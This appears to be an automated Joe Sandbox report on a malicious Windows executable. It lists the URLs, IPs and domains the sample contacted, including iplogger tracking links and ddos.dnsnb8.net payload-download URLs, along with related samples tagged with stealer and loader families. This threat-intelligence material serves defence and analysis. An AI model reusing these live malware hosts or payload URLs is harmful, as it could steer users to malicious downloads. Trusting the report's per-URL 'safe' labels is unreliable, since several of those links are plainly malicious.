                                          http://ww12.icodeps.com/Certificates65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1s4qp765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1uS4i765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1uW6i765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.activestate.comSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.amazon.com/65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • URL Reputation: safe
                                          unknown
                                          https://iplogger.org/1Ghzj765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEMDSxhU.exe, 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmp, MDSxhU.exe, 00000006.00000003.1336230406.0000000001340000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1TW3i765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://parking.parklogic.com/page/enhance.js?pcId=12&domain=icodeps.com65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386045585.000000000119E000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1mxKf765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mkpmc.com/Home/Index/getdata65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1vk2Q765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.spaceblue.comMathiasSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1NyYz765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ww12.icodeps.com/65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1J9q6765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://prntscr.com/upload.php65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1ELna765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k5.rarwMDSxhU.exe, 00000006.00000003.1487485666.0000000001422000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://sm.ms/api/v2/upload?inajax=165BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.google.com/search?q=admob&oq=admob65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/14Jup765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1SWks765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.lua.orgSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1Gczj765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ww12.icodeps.com/?usid=26&utid=733444648165BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf465BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net/MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://gady45.s3.amazonaws.com/sadjj665BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ww12.icodeps.com//665BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1YkFc765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k3.rarcC:MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://iplogger.org/1CDGu765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1vv2Q765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd565BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ww12.icodeps.com/osoft65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k3.rar8MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://iplogger.org/1Gjzj765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1756b765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.scintilla.org/scite.rngSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ww99.icodeps.com/W765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1Gbzj765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k4.rarfficeMDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://iplogger.org/1spuy765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ww99.icodeps.com/o765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.channelinfo.pw/index.php/Home/Index/getExe65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://trkpcy.net/track.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1XJq9765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1BBCf765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.baanboard.comBrendonSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/143up765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.smartsharesystems.com/SciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.scintilla.orgSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k1.rarq_MDSxhU.exe, 00000006.00000003.1361370867.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k5.rar8MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://iplogger.org/1HWGc765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          172.67.132.113
                                          iplogger.orgUnited States
                                          13335CLOUDFLARENETUSfalse
                                          13.248.148.254
                                          765534.parkingcrew.netUnited States
                                          16509AMAZON-02USfalse
                                          172.232.25.148
                                          www.icodeps.comUnited States
                                          20940AKAMAI-ASN1EUfalse
                                          44.221.84.105
                                          ddos.dnsnb8.netUnited States
                                          14618AMAZON-AESUSfalse
                                          67.225.218.41
                                          ww99.icodeps.comUnited States
                                          32244LIQUIDWEBUSfalse
                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1480317
                                          Start date and time:2024-07-24 17:31:54 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 38s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:19
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                          Detection:MAL
                                          Classification:mal100.spre.troj.expl.evad.winEXE@10/23@6/5
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                          • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                          TimeTypeDescription
                                          11:33:36API Interceptor2x Sleep call for process: WerFault.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          172.67.132.1134FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                            4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                              4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                                  1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                    1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                                      SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRATBrowse
                                                        SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRATBrowse
                                                          UmMgwOUPt5.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                            SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                                                              13.248.148.254eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                              • ww38.fmoovies.to/
                                                              http://www.multipool.usGet hashmaliciousUnknownBrowse
                                                              • ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
                                                              http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                                              • ww38.pollyfill.io/favicon.ico
                                                              http://simxtrackredirecttszz.pages.dev/Get hashmaliciousUnknownBrowse
                                                              • ww12.ngelit.com/favicon.ico
                                                              file.exeGet hashmaliciousCMSBruteBrowse
                                                              • ww12.runfoxyrun.com/administrator/index.php?usid=18&utid=25958170171
                                                              http://dohigu.comGet hashmaliciousUnknownBrowse
                                                              • ww12.dohigu.com/favicon.ico
                                                              http://cs.ffbtas.comGet hashmaliciousUnknownBrowse
                                                              • ww9.ffbtas.com/favicon.ico
                                                              http://browser-intake-foxbusiness.comGet hashmaliciousUnknownBrowse
                                                              • ww12.browser-intake-foxbusiness.com/track.php?domain=browser-intake-foxbusiness.com&caf=1&toggle=answercheck&answer=yes&uid=MTcxMzg5NTI1Mi44NjE1OmM2OTk2NjQ2NzQ1ODFkZjQ1ZGY1Yzk2MTk5MTNlY2I4NjgwMTEwZmU5ZDNmNWY5MDkzMmE3YWRiNjI0MDgwOWY6NjYyN2Y3NTRkMjUyNg%3D%3D
                                                              jqXe6tttFa.exeGet hashmaliciousPovlsomware, RansomeToadBrowse
                                                              • ww12.primearea.biz/favicon.ico
                                                              http://zacharryblogs.comGet hashmaliciousUnknownBrowse
                                                              • ww12.zacharryblogs.com/favicon.ico
                                                              44.221.84.10563D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • ddos.dnsnb8.net:799/cj//k5.rar
                                                              641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exeGet hashmaliciousBdaejecBrowse
                                                              • ddos.dnsnb8.net:799/cj//k1.rar
                                                              62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exeGet hashmaliciousBdaejec, LokibotBrowse
                                                              • ddos.dnsnb8.net:799/cj//k1.rar
                                                              5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • ddos.dnsnb8.net:799/cj//k5.rar
                                                              5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • ddos.dnsnb8.net:799/cj//k2.rar
                                                              58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • ddos.dnsnb8.net:799/cj//k2.rar
                                                              weH771UOWv.exeGet hashmaliciousSalityBrowse
                                                              • arthur.niria.biz/xs.jpg?601b2a60=-2140362368
                                                              56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                              • ddos.dnsnb8.net:799/cj//k2.rar
                                                              54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • ddos.dnsnb8.net:799/cj//k1.rar
                                                              55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                              • ddos.dnsnb8.net:799/cj//k5.rar
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              765534.parkingcrew.netmp3studios_6.exeGet hashmaliciousSocelarsBrowse
                                                              • 76.223.26.96
                                                              mp3studios_92.exeGet hashmaliciousSocelarsBrowse
                                                              • 76.223.26.96
                                                              microsoft office 2007 service pack 2.exeGet hashmaliciousUnknownBrowse
                                                              • 13.248.148.254
                                                              ww99.icodeps.com4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                              • 67.225.218.41
                                                              iplogger.org4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                              • 104.21.4.208
                                                              4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                              • 172.67.132.113
                                                              4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                              • 172.67.132.113
                                                              file.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                              • 104.21.4.208
                                                              setup.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, VidarBrowse
                                                              • 104.21.4.208
                                                              1720605557.036432_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, VidarBrowse
                                                              • 104.21.4.208
                                                              1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                                              • 172.67.132.113
                                                              1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                              • 172.67.132.113
                                                              1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                                              • 172.67.132.113
                                                              SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                              • 104.21.4.208
                                                              www.icodeps.com4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                              • 172.232.4.213
                                                              7zS.sfx.exeGet hashmaliciousCryptOne, Fabookie, Nymaim, SmokeLoader, Socelars, lgoogLoader, onlyLoggerBrowse
                                                              • 127.0.0.1
                                                              mp3studios_6.exeGet hashmaliciousSocelarsBrowse
                                                              • 67.225.218.6
                                                              mp3studios_92.exeGet hashmaliciousSocelarsBrowse
                                                              • 67.225.218.6
                                                              0fx8tmMwZ9.exeGet hashmaliciousFabookie, ManusCrypt, Nymaim, SocelarsBrowse
                                                              • 149.28.253.196
                                                              HzmqhxP0xt.exeGet hashmaliciousSocelarsBrowse
                                                              • 149.28.253.196
                                                              file.exeGet hashmaliciousSocelarsBrowse
                                                              • 149.28.253.196
                                                              PkjZMkwOLt.exeGet hashmaliciousSocelarsBrowse
                                                              • 149.28.253.196
                                                              file.exeGet hashmaliciousSocelarsBrowse
                                                              • 149.28.253.196
                                                              cOJ3C29gsz.exeGet hashmaliciousSocelarsBrowse
                                                              • 149.28.253.196
                                                              ddos.dnsnb8.net641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exeGet hashmaliciousBdaejecBrowse
                                                              • 44.221.84.105
                                                              62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exeGet hashmaliciousBdaejec, LokibotBrowse
                                                              • 44.221.84.105
                                                              5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • 44.221.84.105
                                                              5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • 44.221.84.105
                                                              58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • 44.221.84.105
                                                              5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                              • 44.221.84.105
                                                              56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                              • 44.221.84.105
                                                              54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • 44.221.84.105
                                                              55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                              • 44.221.84.105
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AKAMAI-ASN1EU4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                              • 172.232.4.213
                                                              https://ridgecomm-my.sharepoint.com/:f:/g/personal/mike_dickson_ridgecommunicate_com/EoIXqm_rhmNPgUmdh9oGxVYBOC8z-wLp52vmISycophX2A?e=pxBR5zGet hashmaliciousHTMLPhisherBrowse
                                                              • 2.16.238.149
                                                              SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.9942.6374.rtfGet hashmaliciousRemcosBrowse
                                                              • 172.233.177.4
                                                              Fw PROPOSITION DE BELGOSUC.emlGet hashmaliciousSharepointPhisherBrowse
                                                              • 2.16.238.152
                                                              FAMIGLIE E BONUS NATALIT pdf lnk.lnkGet hashmaliciousCoinhive, XmrigBrowse
                                                              • 23.200.0.17
                                                              Building Made Easy Proposal .pdfGet hashmaliciousUnknownBrowse
                                                              • 23.67.131.235
                                                              Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                              • 23.219.161.132
                                                              S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              • 172.234.216.245
                                                              https://forms.office.com/Pages/ResponsePage.aspx?id=1Q-W37eeFkOVQFk99a-XlFYn76Ck1HRGrw1irS-ELQ9URTlQNkZEQk9aR1UyU0ZYQzNDUjVRWk1YUi4uGet hashmaliciousUnknownBrowse
                                                              • 104.83.5.113
                                                              [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
                                                              • 2.16.241.13
                                                              AMAZON-AESUS63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • 44.221.84.105
